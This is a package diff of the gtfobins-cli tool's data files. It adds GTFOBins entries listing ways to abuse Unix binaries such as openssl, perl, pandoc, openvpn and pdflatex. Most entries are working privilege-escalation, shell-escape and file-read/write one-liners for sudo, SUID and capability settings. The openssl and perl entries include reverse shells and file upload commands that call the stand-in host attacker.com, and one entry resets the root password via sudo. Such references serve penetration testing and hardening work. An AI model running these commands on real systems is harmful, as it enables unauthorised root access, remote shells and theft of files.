gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/ntpdate.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nntpdate -a x -k $LFILE -d localhost\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo ntpdate -a x -k $LFILE -d localhost\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./ntpdate -a x -k $LFILE -d localhost\n"
+      }
+    ]
+  }
+}

gtfo/data/nvim.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "command": [
+      {
+        "description": "",
+        "code": "COMMAND=id\nnvim -c ':!'$COMMAND\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "sudo nvim -c ':terminal'\n"
+      }
+    ]
+  }
+}

gtfo/data/octave.json

@@ -0,0 +1,34 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "octave-cli --eval 'system(\"/bin/sh\")'\n"
+      }
+    ],
+    "file-write": [
+      {
+        
+        "code": "octave-cli --eval 'filename = \"file_to_write\"; fid = fopen(filename, \"w\"); fputs(fid, \"DATA\"); fclose(fid);'\n"
+      }
+    ],
+    "file-read": [
+      {
+        
+        "code": "octave-cli --eval 'format none; fid = fopen(\"file_to_read\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo octave-cli --eval 'system(\"/bin/sh\")'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "./octave-cli --eval 'system(\"/bin/sh\")'\n"
+      }
+    ]
+  }
+}

gtfo/data/od.json

@@ -1,20 +1,22 @@
 {
-  "description": "Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.",
   "functions": {
     "file-read": [
       {
-        "code": "od -An -c -w9999 [file]\n"
+        
+        "code": "LFILE=file_to_read\nod -An -c -w9999 \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./od -An -c -w9999 [file]\n"
+        
+        "code": "LFILE=file_to_read\n./od -An -c -w9999 \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo od -An -c -w9999 [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo od -An -c -w9999 \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/openssl.json

@@ -2,54 +2,59 @@
   "functions": {
     "reverse-shell": [
       {
-        "description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.",
-        "code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n"
+        "description": "To receive the shell run the following on the attacker box:\n\n    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n    openssl s_server -quiet -key key.pem -cert cert.pem -port 12345\n\nCommunication between attacker and target will be encrypted.\n",
+        "code": "RHOST=attacker.com\nRPORT=12345\nmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s\n"
       }
     ],
     "file-upload": [
       {
-        "description": "To collect the file run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port] > [file]\n\nSend a local file via TCP. Transmission will be encrypted.",
-        "code": "openssl s_client -quiet -connect [host]:[port] < [file]\n"
+        "description": "To collect the file run the following on the attacker box:\n\n    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n    openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save\n\nSend a local file via TCP. Transmission will be encrypted.\n",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_to_send\nopenssl s_client -quiet -connect $RHOST:$RPORT < \"$LFILE\"\n"
       }
     ],
     "file-download": [
       {
-        "description": "To send the file run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port] < [file]\n\nFetch a file from a TCP port, transmission will be encrypted.",
-        "code": "openssl s_client -quiet -connect [host]:[port] > [file]\n"
+        "description": "To send the file run the following on the attacker box:\n\n    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n    openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send\n\nFetch a file from a TCP port, transmission will be encrypted.\n",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_to_save\nopenssl s_client -quiet -connect $RHOST:$RPORT > \"$LFILE\"\n"
       }
     ],
     "file-write": [
       {
-        "code": "echo DATA | openssl enc -out [file]\n"
+        
+        "code": "LFILE=file_to_write\necho DATA | openssl enc -out \"$LFILE\"\n"
       },
       {
-        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\nopenssl enc -in $TF -out [file]\n"
+        
+        "code": "LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nopenssl enc -in \"$TF\" -out \"$LFILE\"\n"
       }
     ],
     "file-read": [
       {
-        "code": "openssl enc -in [file]\n"
+        
+        "code": "LFILE=file_to_read\nopenssl enc -in \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.",
-        "code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n"
+        "description": "To receive the shell run the following on the attacker box:\n\n    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n    openssl s_server -quiet -key key.pem -cert cert.pem -port 12345\n\nCommunication between attacker and target will be encrypted.\n",
+        "code": "RHOST=attacker.com\nRPORT=12345\nmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s\n"
       },
       {
-        "code": "echo DATA | openssl enc -out [file]\n"
+        
+        "code": "LFILE=file_to_write\necho DATA | openssl enc -out \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.",
-        "code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n"
+        "description": "To receive the shell run the following on the attacker box:\n\n    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n    openssl s_server -quiet -key key.pem -cert cert.pem -port 12345\n\nCommunication between attacker and target will be encrypted.\n",
+        "code": "RHOST=attacker.com\nRPORT=12345\nmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s\n"
       }
     ],
     "library-load": [
       {
-        "code": "openssl req -engine ./lib.so"
+        
+        "code": "openssl req -engine ./lib.so\n"
       }
     ]
   }
-}
+}

gtfo/data/openvpn.json

@@ -1,27 +1,35 @@
 {
   "functions": {
+    "shell": [
+      {
+        
+        "code": "openvpn --dev null --script-security 2 --up '/bin/sh -c sh'\n"
+      }
+    ],
     "file-read": [
       {
         "description": "The file is actually parsed and the first partial wrong line is returned in an error message.",
-        "code": "openvpn --config \"[file]\"\n"
+        "code": "LFILE=file_to_read\nopenvpn --config \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./openvpn --dev tun0 --script-security 2 --up '/bin/sh -p -c \"sh -p\"'\n"
+        
+        "code": "./openvpn --dev null --script-security 2 --up '/bin/sh -p -c \"sh -p\"'\n"
       },
       {
         "description": "The file is actually parsed and the first partial wrong line is returned in an error message.",
-        "code": "./openvpn --config \"[file]\"\n"
+        "code": "LFILE=file_to_read\n./openvpn --config \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh'\n"
+        
+        "code": "sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'\n"
       },
       {
         "description": "The file is actually parsed and the first partial wrong line is returned in an error message.",
-        "code": "sudo openvpn --config \"[file]\"\n"
+        "code": "LFILE=file_to_read\nsudo openvpn --config \"$LFILE\"\n"
       }
     ]
   }

gtfo/data/openvt.json

@@ -3,7 +3,7 @@
     "sudo": [
       {
         "description": "The command execution is blind (displayed on the virtual console), but it is possible to save the output on a temporary file.",
-        "code": "TF=$(mktemp -u)\nsudo openvt -- sh -c \"[command] >$TF 2>&1\"\ncat $TF\n"
+        "code": "COMMAND=id\nTF=$(mktemp -u)\nsudo openvt -- sh -c \"$COMMAND >$TF 2>&1\"\ncat $TF\n"
       }
     ]
   }

gtfo/data/opkg.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "It runs an interactive shell using a specially crafted Debian package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'exec /bin/sh' > $TF/x.sh\nfpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF\n```\n",
+        "code": "sudo opkg install x_1.0_all.deb\n"
+      }
+    ]
+  }
+}

gtfo/data/pandoc.json

@@ -0,0 +1,40 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\npandoc -t plain \"$LFILE\"\n"
+      }
+    ],
+    "file-write": [
+      {
+        
+        "code": "LFILE=file_to_write\necho DATA | pandoc -t plain -o \"$LFILE\"\n"
+      }
+    ],
+    "shell": [
+      {
+        "description": "Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.",
+        "code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' >$TF\npandoc -L $TF /dev/null\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_write\necho DATA | ./pandoc -t plain -o \"$LFILE\"\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.",
+        "code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' >$TF\n./pandoc -L $TF /dev/null\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.",
+        "code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' >$TF\nsudo pandoc -L $TF /dev/null\n"
+      }
+    ]
+  }
+}

gtfo/data/passwd.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "",
+        "code": "PASS=new_password_here\necho -e \"$PASS\\n$PASS\" | sudo passwd root\nsu root\n"
+      }
+    ]
+  }
+}

gtfo/data/paste.json

@@ -2,17 +2,20 @@
   "functions": {
     "file-read": [
       {
-        "code": "paste [file]\n"
+        
+        "code": "LFILE=file_to_read\npaste $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "paste [file]\n"
+        
+        "code": "LFILE=file_to_read\npaste $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo paste [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo paste $LFILE\n"
       }
     ]
   }

gtfo/data/pax.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "The output is a `tar` archive containing the read file as it is, hence this may not be suitable to read arbitrary binary files.",
+        "code": "LFILE=file_to_read\npax -w \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/pdb.json

@@ -1,15 +1,16 @@
 {
-  "description": "This allows to execute Python code, other functions may apply.",
   "functions": {
     "shell": [
       {
+        
         "code": "TF=$(mktemp)\necho 'import os; os.system(\"/bin/sh\")' > $TF\npdb $TF\ncont\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp)\necho 'import os; os.system(\"/bin/sh\")' > $TF\nsudo pdb $TF\ncont\n"
       }
     ]
   }
-}
+}

gtfo/data/pdflatex.json

@@ -2,26 +2,29 @@
   "functions": {
     "shell": [
       {
+        
         "code": "pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
       }
     ],
     "file-read": [
       {
         "description": "The read file will be part of the output.",
-        "code": "pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}'\npdftotext article.pdf -\n"
+        "code": "pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{file_to_read}\\end{document}'\npdftotext article.pdf -\n"
       }
     ],
     "sudo": [
       {
         "description": "The read file will be part of the output.",
-        "code": "sudo pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}'\npdftotext article.pdf -\n"
+        "code": "sudo pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{file_to_read}\\end{document}'\npdftotext article.pdf -\n"
       },
       {
+        
         "code": "sudo pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "./pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
       }
     ]

gtfo/data/pdftex.json

@@ -2,16 +2,19 @@
   "functions": {
     "shell": [
       {
+        
         "code": "pdftex --shell-escape '\\write18{/bin/sh}\\end'\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo pdftex --shell-escape '\\write18{/bin/sh}\\end'\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "./pdftex --shell-escape '\\write18{/bin/sh}\\end'\n"
       }
     ]

gtfo/data/perf.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "perf stat /bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./perf stat /bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo perf stat /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/perl.json

@@ -2,33 +2,54 @@
   "functions": {
     "shell": [
       {
-        "code": "perl -e 'exec \"/bin/sh\";'"
+        "description": "",
+        "code": "perl -e 'exec \"/bin/sh\";'\n"
       }
     ],
     "file-read": [
       {
-        "code": "perl -ne print [file]"
+        "description": "",
+        "code": "LFILE=file_to_read\nperl -ne print $LFILE\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "export RHOST=attacker.com\nexport RPORT=8080\nexport LFILE=file_to_send\nperl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>$ENV{\"RHOST\"}, PeerPort=>$ENV{\"RPORT\"}, Proto=>\"tcp\") or die;open(my $file, \"<\", $ENV{\"LFILE\"}) or die;$content = join(\"\", <$file>);close($file);$post_data = \"d=\" . $content;$headers = \"POST / HTTP/1.1\\r\\nHost: \" . $ENV{\"RHOST\"} . \"\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \" . length($post_data) . \"\\r\\nConnection: close\\r\\n\\r\\n\";print $s $headers . $post_data;while (<$s>) { }close($s);'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Download a file via HTTP. For example, run `python3 -m http.server 8080` on the serving side.",
+        "code": "export RHOST=attacker.com\nexport RPORT=8080\nexport URL=/exploit.sh\nexport LFILE=output.txt\nperl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>$ENV{\"RHOST\"},PeerPort=>$ENV{\"RPORT\"},Proto=>\"tcp\") or die; print $s \"GET \" . $ENV{\"URL\"} . \" HTTP/1.1\\r\\nHost: \" . $ENV{\"RHOST\"} . \"\\r\\nMetadata: true\\r\\nConnection: close\\r\\n\\r\\n\"; open(my $fh, \">\", $ENV{\"LFILE\"}) or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq \"\\r\\n\") { $in_content = 1; } } close($s); close($fh);'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in([port],inet_aton(\"[host]\")))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nperl -e 'use Socket;$i=\"$ENV{RHOST}\";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n"
       }
     ],
     "suid": [
       {
-        "code": "./perl -e 'exec \"/bin/sh\";'"
+        "description": "",
+        "code": "./perl -e 'exec \"/bin/sh\";'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo perl -e 'exec \"/bin/sh\";'"
+        "description": "",
+        "code": "sudo perl -e 'exec \"/bin/sh\";'\n"
+      },
+      {
+        "description": "Don't forget to `CTRL+D` to exit the perl shell and get the shell.",
+        "code": "sudo PERL5OPT=-d PERL5DB='exec \"/bin/sh\"' perl\n"
       }
     ],
     "capabilities": [
       {
-        "code": "./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'"
+        "description": "",
+        "code": "./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'\n"
       }
     ]
   }

gtfo/data/perlbug.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'\n"
+      }
+    ]
+  }
+}

gtfo/data/pexec.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "pexec /bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./pexec /bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo pexec /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/pg.json

@@ -2,23 +2,27 @@
   "functions": {
     "shell": [
       {
+        
         "code": "pg /etc/profile\n!/bin/sh\n"
       }
     ],
     "file-read": [
       {
-        "code": "pg [file]"
+        
+        "code": "pg file_to_read\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo pg /etc/profile\n!/bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./pg [file]"
+        
+        "code": "./pg file_to_read\n"
       }
     ]
   }
-}
+}